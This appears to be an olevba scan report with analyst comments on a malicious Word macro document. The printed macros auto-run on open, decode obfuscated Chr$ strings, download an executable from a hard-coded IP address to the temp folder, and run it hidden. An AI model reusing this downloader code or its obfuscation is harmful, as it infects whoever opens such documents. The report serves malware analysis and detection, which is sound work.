- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- XML:MAS---- 2773kxh.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 2773kxh.doc
- Type: Word2003_XML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen() ' Auto-exec entry point: Word runs a macro named AutoOpen when the document is opened.
- z4vF73d ' Only action: call z4vF73d, the Sub defined in the module that declares URLDownloadToFileA.
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO АвпавА.bas
- in file: editdata.mso - OLE stream: u'VBA/\u0410\u0432\u043f\u0430\u0432\u0410'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function IOVANMdhjbAO(ySIzNYGGtuUeqS As String) As String ' String de-obfuscator: returns the characters at odd positions (1, 3, 5, ...) of its argument.
- For QpHTHEyQNlU = 1 To Len(ySIzNYGGtuUeqS) Step 2 ' Step 2 skips every second character; the skipped characters are discarded.
- IOVANMdhjbAO = IOVANMdhjbAO & Mid(ySIzNYGGtuUeqS, QpHTHEyQNlU, 1) ' Append one kept character to the return value.
- Next
- End Function ' Analyst note: nothing in this helper matches a scanner keyword, but it is what decodes the Chr$-built strings passed to it in z4vF73d.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO АПАВПавпв.bas
- in file: editdata.mso - OLE stream: u'VBA/\u0410\u041f\u0410\u0412\u041f\u0430\u0432\u043f\u0432'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then
- Private Declare PtrSafe Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
- ByVal ÏÀÌÎÐâûà As String, _
- ByVal ÏÀÌÎÐâûàf As String, _
- ByVal ÏÀÌÎÐâûàfd As Long, _
- ByVal ÏÀÌÎÐâûàfds As LongPtr) As LongPtr ' VBA7 (PtrSafe) declaration: binds the obfuscated function name to URLDownloadToFileA exported by urlmon.
- #Else
- Private Declare Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
- ByVal ÏÀÌÎÐâûà As String, _
- ByVal ÏÀÌÎÐâûàf As String, _
- ByVal ÏÀÌÎÐâûàfd As Long, _
- ByVal ÏÀÌÎÐâûàfds As Long) As Long ' Pre-VBA7 declaration of the same import, with Long in place of LongPtr.
- #End If
- Sub z4vF73d() ' Builds two strings from Chr$() codes, de-interleaves each with IOVANMdhjbAO, and passes them to the download-and-run function below.
- ïðïàðûâà IOVANMdhjbAO(Chr$(104) & Chr$(56) & Chr$(116) & Chr$(65) & Chr$(116) & Chr$(92) & Chr$(112) & Chr$(85) & Chr$(58) & Chr$(52) & Chr$(47) & Chr$(78) & Chr$(47) & Chr$(127) & Chr$(57) & Chr$(127) & Chr$(53) & Chr$(79) & Chr$(46) & Chr$(96) & Chr$(49) & Chr$(120) & Chr$(54) & Chr$(74) & Chr$(51) & Chr$(112) & Chr$(46) & Chr$(72) & Chr$(49) & Chr$(118) & Chr$(50) & Chr$(53) & Chr$(49) & Chr$(102) & Chr$(46) & Chr$(53) & Chr$(49) & Chr$(75) & Chr$(56) & Chr$(63) & Chr$(54) & Chr$(98) & Chr$(47) & Chr$(66) & Chr$(97) & Chr$(110) & Chr$(112) & Chr$(78) & Chr$(105) & Chr$(99) & Chr$(47) & Chr$(110) & Chr$(103) & Chr$(103) & Chr$(98) & Chr$(125) & Chr$(98) & Chr$(58) & Chr$(49) & Chr$(86) & Chr$(46) & Chr$(101) & Chr$(101) & Chr$(104) & Chr$(120) & Chr$(122) & Chr$(101) & Chr$(68)) _
- , Environ(IOVANMdhjbAO(Chr$(84) & Chr$(99) & Chr$(77) & Chr$(70) & Chr$(80) & Chr$(83))) & IOVANMdhjbAO(Chr$(92) & Chr$(97) & Chr$(71) & Chr$(129) & Chr$(72) & Chr$(81) & Chr$(106) & Chr$(79) & Chr$(107) & Chr$(110) & Chr$(100) & Chr$(91) & Chr$(102) & Chr$(96) & Chr$(103) & Chr$(80) & Chr$(46) & Chr$(128) & Chr$(101) & Chr$(84) & Chr$(120) & Chr$(43) & Chr$(101) & Chr$(39)) ' Analyst note (decoded by keeping odd positions; defanged): first argument = hxxp://95[.]163[.]121[.]186/api/gbb1[.]exe, second = Environ("TMP") & "\GHjkdfg.exe". The scanner reports no IOC for this module because both strings exist only as interleaved Chr$ codes.
- End Sub
- Function ïðïàðûâà(zOF3 As String, Dm4y As String) As Boolean ' Download-and-execute helper: zOF3 is passed as the URL and Dm4y as the local file name; the function name is never assigned, so the return value stays at the default False.
- âûàûâÀÀâûà = ÌÐÎìîðÌÐÎàâï(0&, zOF3, Dm4y, 0&, 0&) ' Calls the URLDownloadToFileA alias; the result is stored in an undeclared variable and never checked.
- ïðïàÀàï = Shell(Dm4y, 0) ' Runs the file just written; window style 0 is vbHide, so no window is shown. The Shell result is also unused.
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: editdata.mso - OLE stream: u'VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub VJfmjcZhYHWzt89() ' Analyst note: none of the subs in Class1 is called from the macros shown in this report; all nine share one shape and look like filler code — TODO confirm.
- Dim caEhbvHeVNIEE28 As Integer
- For caEhbvHeVNIEE28 = 8 To wn ' wn is not declared or assigned anywhere visible; if it evaluates to 0 the loop body never runs.
- DoEvents
- Next caEhbvHeVNIEE28
- Dim DcsgpIlJKVLll87 As String
- DcsgpIlJKVLll87 = "UDMGtgGDgYjFI65" ' Assigned and never read.
- End Sub
- Public Sub rEFykkBadCmlT28() ' Same pattern as VJfmjcZhYHWzt89: loop to an unset bound, then an unused string.
- Dim PxdhIsVstODSN96 As Integer
- For PxdhIsVstODSN96 = 6 To zo
- DoEvents
- Next PxdhIsVstODSN96
- Dim lyRYKztwOtcCv68 As String
- lyRYKztwOtcCv68 = "QpVdrqKVaheqW83"
- End Sub
- Public Sub xHCiwNdMbiMXH41() ' Same pattern as VJfmjcZhYHWzt89.
- Dim DMjDUoNwJkvod99 As Integer
- For DMjDUoNwJkvod99 = 6 To AZ
- DoEvents
- Next DMjDUoNwJkvod99
- Dim MbOCKZMnWgyDP71 As String
- MbOCKZMnWgyDP71 = "dLnHyOaEiCcXm17"
- End Sub
- Public Sub pRsFNsbPhfYFW88() ' Same pattern as VJfmjcZhYHWzt89.
- Dim hZLjOUpaCBMMS47 As Integer
- For hZLjOUpaCBMMS47 = 7 To Hd
- DoEvents
- Next hZLjOUpaCBMMS47
- Dim iqHqrfwpCwVKm36 As String
- iqHqrfwpCwVKm36 = "TZxKCjtsLEbMO94"
- End Sub
- Public Sub qWpQUsRUDvlHS43() ' Same pattern as VJfmjcZhYHWzt89.
- Dim IdGlnffOOYXKa12 As Integer
- For IdGlnffOOYXKa12 = 4 To BO
- DoEvents
- Next IdGlnffOOYXKa12
- Dim jYPxUyallTLis72 As String
- jYPxUyallTLis72 = "WIblPzwJHhazc55"
- End Sub
- Public Sub ljeCsroJoUhyE78() ' Same pattern as VJfmjcZhYHWzt89.
- Dim VlLLfBEgYlxNH62 As Integer
- For VlLLfBEgYlxNH62 = 3 To Uz
- DoEvents
- Next VlLLfBEgYlxNH62
- Dim BBwgLcWwNGMPI35 As String
- BBwgLcWwNGMPI35 = "gqyUHUrqCVfvX89"
- End Sub
- Public Sub htVyaunRmFwQL32() ' Same pattern as VJfmjcZhYHWzt89.
- Dim TjUvVjOmkCGbi21 As Integer
- For TjUvVjOmkCGbi21 = 8 To QX
- DoEvents
- Next TjUvVjOmkCGbi21
- Dim rLdSRlDmsMiEB93 As String
- rLdSRlDmsMiEB93 = "uBpzNGLNvRppY68"
- End Sub
- Public Sub yETfojXKzCRAj76() ' Same pattern as VJfmjcZhYHWzt89.
- Dim pOEEEDavfUYoV65 As Integer
- For pOEEEDavfUYoV65 = 1 To ej
- DoEvents
- Next pOEEEDavfUYoV65
- Dim mgSnlzcAerxTa65 As String
- mgSnlzcAerxTa65 = "ZlbRmltyNfIuf63"
- End Sub
- Public Sub pEXQlfifgpFAb63() ' Same pattern as VJfmjcZhYHWzt89.
- Dim kIPGmTHKqlBzS46 As Integer
- For kIPGmTHKqlBzS46 = 1 To fc
- DoEvents
- Next kIPGmTHKqlBzS46
- Dim TmBfAKqohhFMq17 As String
- TmBfAKqohhFMq17 = "oRtXhFaWkBPgf45"
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.